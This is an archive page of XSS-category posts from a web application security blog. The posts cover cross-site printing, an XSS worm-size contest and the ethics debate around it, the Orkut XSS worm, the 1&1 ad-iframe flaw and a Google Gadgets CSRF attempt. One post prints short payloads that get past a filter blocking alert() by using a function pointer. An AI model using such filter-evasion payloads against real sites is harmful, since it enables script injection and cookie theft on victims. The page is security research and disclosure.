Archive for the 'XSS' Category

Aaron Weaver has taken the concept of Inter protocol XSS hacking to the next annoying level. That’s right folks, he has figured out that you can do cross site printing. That is, when you visit a malicious website, it can attempt to connect to and send data to your printer on your local network. The obvious use? You got it, spam!

So now, when you visit sites, there is a potential for them to spam you, similar to the way some people receive FAX spam. While he has only gone so far as to show how you can send ASCII art, it would be interesting to see if a PostScript formatted file could be sent in a way that the printer would understand and print. For the time being, however, we are limited to low def ASCII art spam.

However, there are some fairly complicated programs that do analysis on and generate ASCII art from photos. What will be more nasty is once this turns into actual exploits against the printers themselves - as many printers contain copies of printed materials for weeks or years afterwards. Also, depending on what the spammers put on your printer, it’s possible this could get people fired, depending on the content of the print job (no pun intended). Very interesting research by Aaron Weaver!

Well, so far this week has probably been one of the most interesting I’ve had in running this site in a long time, not only from a technical perspective, but the ethical debate on whether I am sheer evil or contributing to the greater good rose it’s ugly head once again. This was in regards to the diminutive XSS worm contest. One of my favorites was where I was being compared to arming people with nuclear weapons. Clearly, and admittedly most of these people have no background in the issue and have never read this site or the rest of sla.ckers, as there is lots of samples of existing worm code in lots of places on the Internet now. Just because they don’t know about it doesn’t mean it’s not there.

The existing samples of code that we have are always plagued by three things though, which makes them difficult to work with and which I don’t care about. Each contain obfuscation for filter evasion, which we’ve already researched to death, payloads, which we have also researched heavily and lastly site specific code, which really is uninteresting to me, unless I were trying to help out that company in particular solve an existing problem. So the goal is to remove those things and focus on the actual XSS propagation, for which there has been little research done to date.

I’ve always said, you don’t understand a problem until you see it and play with it. This is why having experience is always more valuable than schooling in a topic. It’s like trying to get in a fist fight with a professional boxer having never sparred before and expecting to win. If working to help the understanding of worm propagation makes me evil, so be it. I’d rather be evil and be able to help solve problems than be good and be useless at solving the problem (as are most of the nay-sayers, I’ve found). That’s why people like Giorgio Maone (the author of the noscript plugin) chipped in to help the contest. People like him are solving the problem in their own ways as well. It’s in everyone’s best interest to understand all the vectors. Will this empower bad guys? I’d be nieve to say there’s no chance of that. However, the goal here is to understand why the propagation methods were chosen so we can build defenses against them. We actually had tons of interesting findings that will help us narrow down the most dangerous strains, and start making suggestions to browser companies and security companies that are in development of security technologies so that they can build tools to prevent this.

For people who liken me to an anti-virus company writing viruses, I’d like to point out the fact of the matter which is that I don’t get paid to consult with browser companies on browser security (at least I haven’t in the last several years that I’ve been doing this). In the spirit of full disclosure, I have gotten paid to help out with other things, but not browser security. That’s right, I give advice in the browser security arena for free (for which I have actually been chastised by other executives who feel like I’m wasting my time since I’m not making any money on it). I do it because I’m actually interested in solving the problem. To date I also have never been paid by any company who has ever been hit by an XSS worm. I have, however, on several occasions given them intel and advice, pro-bono. Also, unlike an anti-virus company, I don’t have a security product in development. So, yes, tin foil hat wearers can rest easy - this actually is academic. I know, crazy talk! That’s why this is an web app security lab. People visit this site (or should, at least) with the knowledge that we are pushing the boundaries of what’s know about web application security. We aren’t talking about yesterday’s problems. Think the bad guys are going to stop their own research if we stop talking about it? In this profit driven malicious ecosystem, there’s no chance of that anymore. At least in an open format we can come up with solutions, and see the results of each other’s work.

Another interesting point of view, by Kurt Wismer was that I was that by creating diminutive code I will always get an output of obfuscated code (which I have said a number of times I was trying to avoid) because of the coding tricks necessary to make it that small. He’s absolutely right, of course, but that’s a red herring. See, there are two types of obfuscation, which may be beyond the grasp of people who don’t actually work in this field. The first type is obfuscation to create short/lean code. The second is obfuscation for filter evasion (MD5ing something, hex encoding something, making something polymorphic, not using the word “eval” but “ev”+”al” to beat some regex or string matching, etc…). I’m sorry I didn’t clarify - that’s probably non obvious for people who don’t understand webappsec. So unfortunately, for the most part that’s actually not an interesting comment, although there are some tidbits in some of the variants of code that actually do cause some problems that I will need to disregard for the sake of research, which I’ll talk about after the contest is over.

Anyway, over the last few days I’ve been called a moron, an idiot and probably a half dozen other things. But through it all, I’m 100% confident that this will lead to previously non-published/understood results about worm propagation (I’m confident, because it’s already yielded some various interesting problems that we have had to clarify using rules that I didn’t even think would come up). And I’m also confident that this will lead to ways in which we can protect ourselves from them - not today, certainly, but over time as we as a community start building tools to prevent these issues based, in part, on the results of this contest. I wouldn’t guess that everyone reading this will “get it” as most people don’t really understand how the security world works. I would, however, hope that everyone sits tight and holds their dramatic postings for the results, or at least asks me what I think instead of jumping to wild conclusions. Christmas is already over though, and I already got my wishes granted so I won’t be surprised if it doesn’t happen.

So that’s the drama! Gotta love it, huh? Where would I be without the under-educated rants and conspiracy theories? The good news is that there is a lot of really interesting research coming out of the contest, and numbers are approaching the 150-170 byte range. We’re already seeing some trends emerge about the most size efficient ways to write the code, and the ways in which the code must work for best propagation results and portability. The two methods of actual spread that appear to be building to a consensus among the submissions are XMLHttpRequest and submit events. We’ll see how things turn out, but I’m quickly getting a feeling these are by far the two most likely candidates for worm propagation. My question is what sort of valid reasons can people come up with on why the browser should automatically submit a form without user interaction? More detailed analysis to come once we get closer to the cutoff. Amazing stuff!

Pandora is already out of the box, folks, and for good or bad Samy was the culprit, not me. Time to start working on solutions, rather than trying to keep the research quiet.

The diminutive XSS worm replication contest is a week long contest to get some good samples of the smallest amount of code necessary for XSS worm propagation. I’m not interested in payloads for this contest, but rather, the actual methods of propagation themselves. We’ve seen the live worm code and all of it is muddied by obfuscation, individual site issues, and the payload itself. I’d rather think cleanly about the most efficient method for propagation where every character matters.

digi7al64 has already posted a sample piece of code, setting the baseline. His code is an impressively small 292 characters. There’s no prize here, however, I will definitely be talking about the winner’s code. The winner will be announced on the 10th after all submissions are in and posted. Visit the thread for more details. This should be interesting for anyone looking at worm propagation issues!

In the wake of the disclosure of Flash vulnerabilities found in thousands of websites, I felt I should probably post something about it. I have read the section of the upcoming book by Rich Cannings and Himanshu Dwivedi, and won’t disclose it, as promised to the person who sent it to me until I hear otherwise (if ever - since it’s a book and you can just buy it). Today I got an email and a call from Adobe with details that they wanted to present to people who may be concerned about it:

Adobe is developing a solution in an update to Flash Player that will prevent these attacks on existing vulnerable SWFs.

Adobe is also applying these guidelines to SWF templates that are commonly deployed, which will be available as updates in early January, and we are working with other software vendors to update their templates.

Together, these strategies provide a complete solution to the potential vulnerabilities.

So if you have flash on your site, it is highly recommended that you take these precautionary steps to protect yourself. It’s nice to see Adobe taking this seriously and working so quickly. I certainly wasn’t expecting a phone call - way to go guys!

John Smith sent me this this link to a writeup on customers who are hosted at 1&1 Internet are vulnerable to XSS. The technique is simple, but it comes from the way in which they present ads based on detection of a file not found. They pop up an iframe based on file name which you can jump out of pretty easily. Not so good. I’m not sure what sort of customers 1&1 Internet provides service for but I’d be unhappy if I were a customer there. Apparently this only applies to Sedo parking prior to a certain date, and also doesn’t apply to users who use custom 404 pages (which I generally prefer to do, personally).

This brings up an interesting point though about the use of third party advertising and how that can be used to do wide scale XSS exploitation. In this case it’s no different, except instead of it being a Dom based XSS like it would normally have to be, the server does a reflection for you. Odd problem. I’ve ran into similar problems with hosting providers that put log files for all their customers in the same predictable location. So finding their customers is the only hard part. Getting their logs is easy! Nice find!

However, Thrill then posted an screenshot of this on one of the several domain registrars that we found to be vulnerable to this. So now we proof that this can be done. Of course the usefulness of this is probably limited to only a few sites, but sites which often take credit card information for payment processing of domains. Which, obviously, has some usefulness for phishing. Anyway, pretty interesting stuff!

Several people sent this to me over the last few days but for those of you who hadn’t seen it in the myriad of different places it showed up, Orkut was hacked using a XSS worm. Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

Rough estimates are north of 300,000 people compromised, even though it was caught relatively quickly. It’s amazing how fast these things grow in environments like that, where the medium for spreading is based on a technology that almost everyone uses and works across platform. I think the only thing stopping this from being more virulent is making it cross platform, and making the social engineering a little more seamless.

Here are the POST requests sent in by Lavakumar:

POST request sent by the worm to add the victim to the “Infectados pelo Vírus do Orkut” community. The community id is “44001818″.

And the code can be found in many places around the net, but I also threw up a copy on the sla.ckers.org XSS worm section for anyone looking for example worm code. I’m trying to keep that section up to date with non-theoretical, but practical and real world worm code so we can all see it. Google has fixed this issue, but it is unclear what the fallout of the damage will be.

I’m always amazed at people who think that blocking alert() is actually an effective way to block cross site scripting. I’ve seen it myself, and it’s one of those things that never sounded right even the first time I saw it years ago. It sounds even less right, and here’s an email from a friend of mine, Jon McClintock:

I just got a nice XSS “win” that I thought I’d share with you. The app had an odd filter that would block JS calls to the alert() method.

So this (invalid JS) input got in:

";alert"xss";

But this didn’t:

";alert("xss");

The usual whitespace and comment tricks didn’t work either, and other useful methods, such as eval, were also blocked. So what do you do? Function pointer, of course:

";var foo=alert;foo("xss");

That’s a great example - pointing to functions, but what about things like confirm(), or prompt()? Sure, maybe all those are blocked too, but come on…. it’s time to start addressing the problem, rather than trying to block one of the hundreds of ways someone can initiate the attack. Anyway, great example!

I know we’ve all thought about it, but for some reason this one is hitting a little more than others. Partially because I think we all like to think we are unique and every hack needs to be forensically important. Think about if you were running the Miami Dolphins and you were to see this happen to your site. You’d want answers, and you’d want them now. And then after spending countless hours and tons of resources you’d find that the answer is you were just one hack of 25,000. The Dolphins had an interesting website but it was actually insignificant in the grand scheme of the attack.

It’s an interesting thought to think that one attack compromised 25,000 websites, which in turn could have compromised potentially hundreds of thousands or even millions of remote machines via the ANI payload through XSS. And ultimately, the attackers are still at large. Pretty scary concept when you think about the low level of diversity in open source web applications, making them much more susceptible to attack. Maybe that tiny webapp hole isn’t so tiny after all.

To further illuminate the problems with Google Gadgets that Tom Stripling spoke about at the OWASP conference, I asked him to type up the details so that we could all take a look at it. I think this is a fairly thorough writeup. Obviously there is some more work to be done here, but ultimately, I think this proves the point:

First of all, here is the Google documentation on inlining, if you’re
interested:

My original goal was to CSRF a module onto someone’s page, then run another CSRF attack that inlined it, and then go to town. Google has thwarted my early efforts, but I’m not convinced that it isn’t possible.

Google has a parameter called “_et” that is set to a random value and required on every change to the iGoogle page. Without this value, you can’t submit a valid request to load a module, so it prevents basic CSRF.

It turns out that the parameter also shows up on the gmodules.com domain for certain “approved” gadgets. So, I was going to steal this parameter with AJAX and use it force a module on someone’s page.

The initial attack would involve someone following a link to the page you identified that allows XSS on gmodules.com. A link like this:

This gadget (which is never meant to actually end up on someone’s page) loads an AJAX request to get the page for another (approved) gadget, steals the _et param and tries to submit a request to google.com that loads the gadget.

It doesn’t work. I had to cut off my testing in the middle because I realized I probably needed to create slides if I was going to present this stuff, but I did notice that the _et param I was stealing was different than the one on my iGoogle home page, so it may be that Google has thought of this and is preventing it by using different _et values for the different domains. It may also be that I have a bug in my JavaScript somewhere. I will be looking into this more as soon as I have time (but I have no idea when that will be).

So right now, I still can’t cross over from gmodules.com to google.com without user interaction. Still, the user interaction is pretty weak. They provide a preview page that will load a module with one click:

And then another click to inline the module. By the way, don’t load that on your real google account. It actually does send your cookies offsite. Feel free to download, play with, or publish any of these gadgets. Here’s another one that just does a basic phishing attack: